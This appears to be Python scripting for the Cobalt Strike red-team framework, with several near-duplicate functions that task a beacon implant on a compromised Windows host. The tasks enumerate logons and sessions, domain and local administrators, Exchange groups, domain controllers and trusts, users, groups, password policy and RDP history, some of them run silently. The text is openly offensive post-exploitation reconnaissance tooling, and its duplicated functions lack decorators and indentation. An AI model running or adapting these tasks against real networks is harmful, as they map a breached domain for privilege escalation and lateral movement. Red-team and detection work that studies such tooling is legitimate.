def _(bid):
import_host_recon(bid)
aggressor.bnet(bid, 'logons')
aggressor.bnet(bid, 'sessions')
command = helpers.code_string(r"""
Write-Output "---------- Explicit logons, past 10 days ----------"
Get-ExplicitLogons 10
Write-Output "`n---------- Logons, past 100 events ----------"
Get-Logons 100
""")
aggressor.btask(bid, 'Tasked beacon to get historical logon information')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = textwrap.dedent(r"""
echo "--- Domain ---"
echo "$env:logonserver"
echo "--- Domain admins ---"
net group "domain admins" /domain
echo "--- Local admins ---"
net localgroup administrators
echo "--- Exchange ---"
net group "Exchange Trusted Subsystem" /domain 2>$null
echo "--- Domain trusts ---"
""")
aggressor.bpowerpick(bid, command)
aggressor.bnet(bid, 'dclist')
aggressor.bnet(bid, 'domain_trusts')
def _(bid):
command = textwrap.dedent(r"""
echo "--- Domain ---"
echo "$env:logonserver"
echo "--- Domain admins ---"
net group "domain admins" /domain
echo "--- Local admins ---"
net localgroup administrators
echo "--- Exchange ---"
net group "Exchange Trusted Subsystem" /domain 2>$null
""")
aggressor.btask(bid, 'Tasked beacon to perform basic domain recon')
aggressor.bpowerpick(bid, command, silent=True)
aggressor.bnet(bid, 'dclist')
aggressor.bnet(bid, 'domain_trusts')
def _(bid):
command = textwrap.dedent("""
echo "--- Host ---"
systeminfo
echo "--- User ---"
whoami /all
echo "Domain: $env:logonserver"
echo "Home: $env:userprofile"
echo "--- Other ---"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>$null
echo "--- Location ---"
pwd
""")
aggressor.bps(bid)
aggressor.bnet(bid, 'logons')
aggressor.bnet(bid, 'sessions')
aggressor.bpowerpick(bid, command)
def _(bid):
aggressor.bnet(bid, 'computers')
aggressor.bnet(bid, 'view')
aggressor.bnet(bid, 'user')
aggressor.bnet(bid, 'group')
command = textwrap.dedent("""
echo "--- Domain ---"
echo $env:logonserver
echo "--- Domain users ---"
net user /domain
echo "--- Domain groups ---"
net groups /domain
echo "--- Domain accounts ---"
net accounts /domain
""")
aggressor.bpowerpick(bid, command)
def _(bid):
aggressor.bnet(bid, 'computers')
aggressor.bnet(bid, 'view')
aggressor.bnet(bid, 'user')
aggressor.bnet(bid, 'group')
command = textwrap.dedent("""
echo "--- Domain ---"
echo $env:logonserver
echo "--- Domain users ---"
net user /domain
echo "--- Domain groups ---"
net groups /domain
echo "--- Domain accounts ---"
net accounts /domain
""")
aggressor.btask(bid, 'Tasked beacon to enumerate domain info')
aggressor.bpowerpick(bid, command, silent=True)